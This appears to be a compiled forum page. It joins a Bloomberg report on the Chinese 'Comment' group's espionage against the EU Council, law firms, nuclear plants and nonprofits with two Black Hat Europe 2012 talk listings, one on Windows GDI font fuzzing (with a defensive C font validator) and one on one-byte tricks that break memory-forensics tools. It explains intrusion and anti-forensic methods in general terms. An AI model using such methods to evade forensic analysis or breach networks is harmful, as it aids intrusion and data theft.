Others, not publicly attributed to the group before, include a campaign against North American natural gas producers that began in December 2011 and was detailed in an April alert by the Department of Homeland Security, two experts who analyzed the attack said.

In another case, the hackers first stole a contact list for subscribers to a nuclear management newsletter, and then sent them forged e-mails laden with spyware. In that instance, the group succeeded in breaking into the computer network of at least one facility, Diablo Canyon nuclear plant, next to the Hosgri fault north of Santa Barbara, according to a person familiar with the case who asked not to be named.

Last August, the plant’s incident management team saw an anonymous Internet post that had been making the rounds among cybersecurity professionals. It purported to identify web domains being used by a Chinese hacking group, including one that suggested a possible connection to Diablo plant operator Pacific Gas & Electric Co., according to an internal report obtained by Bloomberg News.

[h=2]Partial Control[/h]
It’s unclear how the information got to the Internet, but when the plant investigated, it found that the computer of a senior nuclear planner was at least partly under the control of the hackers, according to the report.
The internal probe warned that the hackers were attempting “to identify the operations, organizations, and security of U.S. nuclear power generation facilities.” The investigators concluded that they had caught the breach early and there was “no solid indication” data was stolen, according to the report, though they also found evidence of several previous infections. Blair Jones, a spokesman for PG&E, declined to comment, citing plant security.

Around the time the hackers were sending malware-laden e-mails to U.S. nuclear facilities, six people at the Wiley Rein law firm were ushered into hastily called meetings. In the room were an ethics compliance officer and a person from the firm’s information technology team, according to a person familiar with the investigation. The firm had been hacked, each of the six was told, and they were the targets.

[h=2]Lawyers’ Files[/h]
Among them were Alan Price and Timothy Brightbill. Firm partners and among the best known international trade lawyers in the country, they’ve handled a series of major anti-dumping and unfair trade cases against China. One of those, against China’s solar cell manufacturers, in May resulted in tariffs on more than $3 billion in Chinese exports, making it one of the largest anti-dumping cases in U.S. history.

Dale Hausman, Wiley Rein’s general counsel, said he couldn’t comment on how the breach affected the firm or its clients. Wiley Rein has since strengthened its network security, Hausman said. “Given the nature of that practice, it’s almost a cost of doing business. It’s not a surprise,” he said.

[h=2]E-Mails to Spouses[/h]
Tipped off by the researchers, the firm called the Federal Bureau of Investigation, which dispatched a team of cyber investigators, the person familiar with the investigation said. Comment hackers had encrypted the data they stole, a trick designed to make it harder to determine what was taken. The FBI managed to decode it.
The data included thousands of pages of e-mails and documents, from lawyers’ personal chatter with their spouses to confidential communications with clients. Printed out in a stack, the cache was taller than a set of encyclopedias, the person said.

Researchers watching the hackers’ keystrokes last summer say they couldn’t see most of what was stolen, but it was clear that the spies had complete control over the firm’s e-mail system. The logs also hold a clue to how the FBI might have decrypted what was stolen. They show the simple password the hackers used to encrypt the files: 123!@#. Paul Bresson, a spokesman for the FBI in Washington, declined to comment.

[h=2]Following the Crisis[/h]
In case after case, the hackers’ trail crisscrossed with geopolitical events and global headlines. Last summer, as the news focused on Europe’s financial crisis, with its import for China’s rising economic power, the hackers followed.

The timing coincided with an intense period for EU Council President Van Rompuy, set off by the failure July 11 of the EU finance ministers to agree on a second bailout package for Greece. Over the next 10 days, the slight and balding former Belgian prime minister presided over the negotiations, drawing European leaders, including German Chancellor Angela Merkel, to a consensus.

Although the monitoring of Van Rompuy and his staff occurred during those talks, researchers say that the logs suggest a broad attack that wasn’t timed to a specific event. It was the cyber equivalent of a wiretap, they say -- an operation aimed at gathering vast amounts of intelligence over weeks, perhaps months.

[h=2]’Big Implications’[/h]
Richard Falkenrath, former deputy homeland security adviser to President George W. Bush, said China has succeeded in integrating decision-making about foreign economic and investment policy with intelligence collection. “That has big implications for the rest of the world when it deals with the country on those terms,” he said.
Beginning July 8, 2011, the hackers’ access already established, they dipped into the council’s networks repeatedly over 10 days. The logs suggest an established routine, with the spies always checking in around 9 a.m. local time. They controlled the council’s exchange server, which gave them complete run of the e-mail system, the logs show. From there, the hackers simply opened the accounts of Van Rompuy and the others.

[h=2]Week of E-Mails[/h]
Moving from one victim to the next, the spies grabbed e-mails and attached documents, encrypted them in compression files and catalogued the reams of material by date. They grabbed a week’s worth of e-mails each time, appearing to follow a set protocol. Their other targets included then economic adviser and deputy head of cabinet, Odile Renaud-Basso, and the EU’s counter-terrorism coordinator.

It’s unclear how long the hackers had been in the council’s network before the researchers’ monitoring began -- or how long it lasted after the end of July last year. There’s no indication the hackers penetrated the council’s offline system for secret documents. “Classified information and other sensitive internal information is handled on separate, dedicated networks,” the council press office said in a statement when asked about the hacks. The networks connected to the Internet, which handle e-mail, “are not designed for handling classified information.”

What the EU did about the breach is unclear. Dirk De Backer, a spokesman for Van Rompuy, declined to comment on the incident, as did an official from the EU Council’s press office. A member of the EU’s security team joined the group of researchers in late July, and was provided information that would help identify the hackers’ trail, one of the researchers said.
[h=2]“No Knowledge”[/h]
Zoltan Martinusz, then principal adviser on external affairs and one of two victims reached by Bloomberg who would address the issue, said, “I have no knowledge of this.” The other official, who wasn’t authorized to discuss internal security and asked not to be identified, said he was informed last year that his e-mails had been accessed.

The logs show how the hackers consistently applied the same, simple line of attack, the researchers said. Starting with a malware-laden e-mail, they moved rapidly through networks, grabbing encrypted passwords, cracking the coding offline, and then returning to mimic the organization’s own network administrators. The hackers were able to dip in and out of networks sometimes over months. The approach circumvented the millions of dollars the organizations collectively spent on protection.

[h=2]Security Switched Off[/h]
As the spies rifled the network of Business Executives for National Security Inc., a Washington-based nonprofit whose advisory council includes former Secretary of State Henry Kissinger and former Treasury Secretary Robert Rubin, the logs show them switching off the system’s Symantec anti-virus software. Henry Hinton Jr., the group’s chief operations officer, said in June he was unaware of the hack, confirming the user names of staff computers that the logs show were accessed, his among them.

The records show the hackers’ mistakes, but also clever tricks. Using network administrator status, they consolidated onto a single machine the computer contents of the president and seven other staff members of the International Republican Institute, a nonprofit group promoting democracy.

[h=2]220 Documents[/h]
With all that data in one place, the hackers on June 29, 2011, selected 220 documents, including PDFs, spreadsheets, photos and the organization’s entire work plan for China.
When they were done, the Comment group zipped up the documents into several encrypted files, making the data less noticeable as it left the network, the logs show. Lisa Gates, a spokeswoman for the IRI, confirmed that her organization was hacked but declined to comment on the impact on its programs in China because of concern for the safety of staff and people who work with the group. A funding document describes activities including supporting independent candidates in China, who frequently face harassment by China’s authorities.

As a portrait of the hackers at work, the logs also show how nimbly they could respond to events, even when sensitive government networks were involved. The hackers accessed the network of the Immigration and Refugee Board of Canada July 18 last year, targeting the computer of Leeann King, an immigration adjudicator in Vancouver. King had made headlines less than a week earlier when she temporarily freed Chinese national Lai Changxing in the final days of a long extradition fight. Chinese authorities had been chasing Lai since he fled to Canada in 1999, alleging that he ran a smuggling ring that netted billions of dollars.

[h=2]Cracking Court Accounts[/h]
Monitoring by Cyber Squared Inc., an Arlington, Virginia-based company that tracks Comment independently and that captured some of the same activity as the researchers, recorded the hackers as they worked rapidly to break into King’s account. Beginning only with access to computers in Toronto, the hackers grabbed and decrypted user passwords, gaining access to IRB’s network in Vancouver and ultimately, the logs show, to King’s computer. From start to finish, the work took just under five hours.

Melissa Anderson, a spokeswoman for the board, said officials had no comment on the incident other than to say that any such event would be fully investigated. Lai was eventually sent back to China on July 23, 2011, after losing a final appeal.
He was arrested, tried, and in May of this year, a Chinese court sentenced him to life in prison.

[h=2]Controlling the Networks[/h]
In case after case, the hackers had the run of the networks they were rifling. It’s unclear how many of the organizations researchers contacted, but in only one of those cases was the victim already aware of the intrusion, according to one member of the group. Halliburton officials said they were aware of the intrusion and were working with the FBI, one of the researchers said. Marisol Espinosa, a spokeswoman for the publicly traded company, declined to comment on the incident.

The trail last summer led to some unlikely spots, including Pietro’s, an Italian restaurant a couple of blocks from Grand Central station in New York. In business since 1932, guests to the dim, old-fashioned dining room can choose linguine with clam sauce (red or white) for $28. The Comment group stopped using the restaurant’s site to communicate with hacked networks sometime last year, said FireEye’s Lanstein, who discovered that the hackers had left footprints there. Traces are still there.

[h=2]’Ugly Gorilla’[/h]
Hidden in the webpage code of the restaurant’s site is a single command: ugs12, he said. It’s an order to a captive computer on some victim’s network to sleep for 12 minutes, then check back in, he explained. The “ug” stands for “ugly gorilla,” what security experts believe is a moniker for a particularly brash member of Comment, a signal for anyone looking that the hackers were there, said Lanstein.

“We’re so good even hackers want us!” joked Bill Bruckman, the restaurant’s co-owner, when he was told his website had been part of the global infrastructure of a Chinese hacking team. “Hey, put my name out there -- any business is good business,” he said. Bruckman said he knew nothing about the breach. A few friends reported trouble accessing the site about six months ago, though he said he’d never figured out what the problem was.
Outside a moment later, smoking a cigarette, Bruckman added a more serious note. “Think of all that effort and information going down the drain. What a waste, you know what I mean?”

Source: Hackers Linked to China’s Army Seen From EU to D.C. - Bloomberg
-
Blackhat 2012 Europe - Gdi Font Fuzzing In Windows Kernel For Fun

Description: Blackhat 2012 EUROPE - GDI Font Fuzzing in Windows Kernel For Fun

https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf
https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-Slides.pdf
https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-Tool.zip

There are different types of fonts available within Windows, falling into two categories: GDI fonts and device fonts. This talk covers only GDI TrueType and GDI bitmap fonts on the Windows platform. In GDI, the typical way to create a font is to fill in a LOGFONT structure and then call CreateFontIndirect, which returns a font handle. As the name suggests, a LOGFONT structure describes a logical font: if the user draws text using that font handle, GDI looks for a matching physical font to draw the text, and if it doesn't find a matching font name, it uses some other font. The consequence is that the font fuzzer works at a lower level, through the physical-font APIs provided by GDI itself, for instance GetFontData, GetGlyphIndices and even ExtTextOut when used with the ETO_GLYPH_INDEX flag. The font fuzzer in this talk aims to trigger font vulnerabilities published on the Internet; two vulnerabilities in the Windows kernel in handling crafted fonts, MS11-077 and MS11-087, are discussed in the talk.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: Blackhat 2012 Europe - Gdi Font Fuzzing In Windows Kernel For Fun
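The abstract above describes feeding GDI crafted TrueType fonts so that the kernel-side font code parses them. As an added example (written for this page; not the talk's tool and not GDI or Windows code), the C program below shows the defender's side of the same format: a validator for the TrueType offset table and table directory that checks bounds, alignment and checksums before any table is trusted, run over a constructed 36-byte font and over every single-byte corruption of its directory, the kind of mutation a font fuzzer produces. The enum, function names and the sample font bytes are constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
/* Validator results; names are constructed for this example (not a GDI/Windows API). */
enum ttf_result { TTF_OK = 0, TTF_ERR_SHORT, TTF_ERR_MAGIC, TTF_ERR_DIR_TOO_LONG,
                  TTF_ERR_TAG, TTF_ERR_RANGE, TTF_ERR_ALIGN, TTF_ERR_CHECKSUM };

/* All TrueType fields are big-endian. */
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}
static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* sfnt table checksum: sum of 32-bit words over the table zero-padded to a multiple
 * of 4. Padding happens in a local buffer, so the sum never reads past `len`. */
static uint32_t ttf_checksum(const uint8_t *p, uint32_t len) {
    uint32_t sum = 0, i;
    for (i = 0; i + 4 <= len; i += 4) sum += be32(p + i);
    if (i < len) {
        uint8_t tail[4] = {0, 0, 0, 0};
        memcpy(tail, p + i, len - i);
        sum += be32(tail);
    }
    return sum;
}

/* Check the offset table and every directory record before any table is parsed.
 * In a crafted font each of these fields is attacker-controlled, so none is trusted. */
int ttf_validate(const uint8_t *buf, size_t len) {
    if (len < 12) return TTF_ERR_SHORT;
    uint32_t version = be32(buf);
    if (version != 0x00010000u && version != 0x74727565u /* 'true' */) return TTF_ERR_MAGIC;
    uint16_t num_tables = be16(buf + 4);
    if (12u + 16u * (size_t)num_tables > len) return TTF_ERR_DIR_TOO_LONG; /* directory fits? */
    for (uint16_t i = 0; i < num_tables; i++) {
        const uint8_t *rec = buf + 12 + 16 * i;
        uint32_t checksum = be32(rec + 4), offset = be32(rec + 8), length = be32(rec + 12);
        for (int k = 0; k < 4; k++)                        /* tags are printable ASCII */
            if (rec[k] < 0x20 || rec[k] > 0x7E) return TTF_ERR_TAG;
        if ((uint64_t)offset + length > len) return TTF_ERR_RANGE; /* 64-bit: cannot wrap */
        if (offset % 4 != 0) return TTF_ERR_ALIGN;
        /* 'head' carries checkSumAdjustment and needs special handling; skipped here. */
        if (memcmp(rec, "head", 4) != 0 && ttf_checksum(buf + offset, length) != checksum)
            return TTF_ERR_CHECKSUM;
    }
    return TTF_OK;
}

/* Constructed 36-byte sample font: offset table, one directory record, a 6-byte
 * 'maxp' version 0.5 table (numGlyphs = 1) and two bytes of padding. */
static const uint8_t SAMPLE_FONT[36] = {
    0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, /* 0x00010000, numTables=1, 16, 0, 0 */
    'm', 'a', 'x', 'p', 0x00, 0x01, 0x50, 0x00, 0x00, 0x00, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x06, /* tag, checksum, offset=28, length=6 */
    0x00, 0x00, 0x50, 0x00, 0x00, 0x01, 0x00, 0x00,                         /* maxp v0.5, numGlyphs=1, pad */
};

/* Mutation-fuzzing probe: overwrite each directory byte in turn with 0xFF and count how
 * many of the corrupted files the validator rejects before any table parser sees them. */
int ttf_count_rejected(const uint8_t *font, size_t len) {
    uint8_t work[64];
    if (len > sizeof work) return -1;
    size_t dir_end = 12 + 16 * (size_t)be16(font + 4);
    int rejected = 0;
    for (size_t pos = 0; pos < dir_end && pos < len; pos++) {
        memcpy(work, font, len);
        work[pos] = 0xFF;
        if (ttf_validate(work, len) != TTF_OK) rejected++;
    }
    return rejected;  /* 22 of 28 for SAMPLE_FONT; only searchRange/entrySelector/rangeShift go unchecked */
}
```

The six accepted corruptions all land in searchRange, entrySelector and rangeShift, redundant binary-search hints that a robust parser recomputes rather than trusts; everything that determines where the parser reads (numTables, offsets, lengths) is caught before a table parser runs.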
-
Blackhat 2012 Europe - One-Byte Modification For Breaking Memory Forensic Analysis

Description:

https://media.blackhat.com/bh-eu-12/Haruyama/bh-eu-12-Haruyama-Memory_Forensic-Slides.pdf

Memory forensics is an effective technique to detect malware quickly or extract sensitive user data from RAM. Memory forensics is separated into two parts: memory acquisition and analysis. So far, some anti-acquisition methods have been proposed and demonstrated, but there has been no sufficient discussion of anti-analysis ones. This presentation introduces anti-analysis methods based on unconsidered assumptions of the existing analysis tools. By using these methods, attackers can abort memory analysis and make the result empty. Since it's difficult for forensic analysts to figure out the cause from error messages, they must think the acquired memory images are simply corrupted.

Specifically, the anti-analysis methods focus attention on three operations performed in memory analysis. All major analysis tools take several rapid approaches in these operations. If attackers want to make the analysis tools fail with the smallest modification, all they have to do is to modify only one byte of the data structure related to one approach. Of course, the modification has no impact on the running system.

The presentation is made up as follows. First, I give an overview of memory acquisition and analysis, such as memory image formats, evaluation of acquisition tools, memory analyzing methods, comparison of analysis tools, and so on. Next, I point out issues of each analysis tool and the key structures referred to by it, then I demonstrate that all analysis tools fail by modifying data in the structures. Finally, I suggest desired usages for forensic analysts and improvement plans for developers to decrease the risk of anti-analysis methods.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: Blackhat 2012 Europe - One-Byte Modification For Breaking Memory Forensic Analysis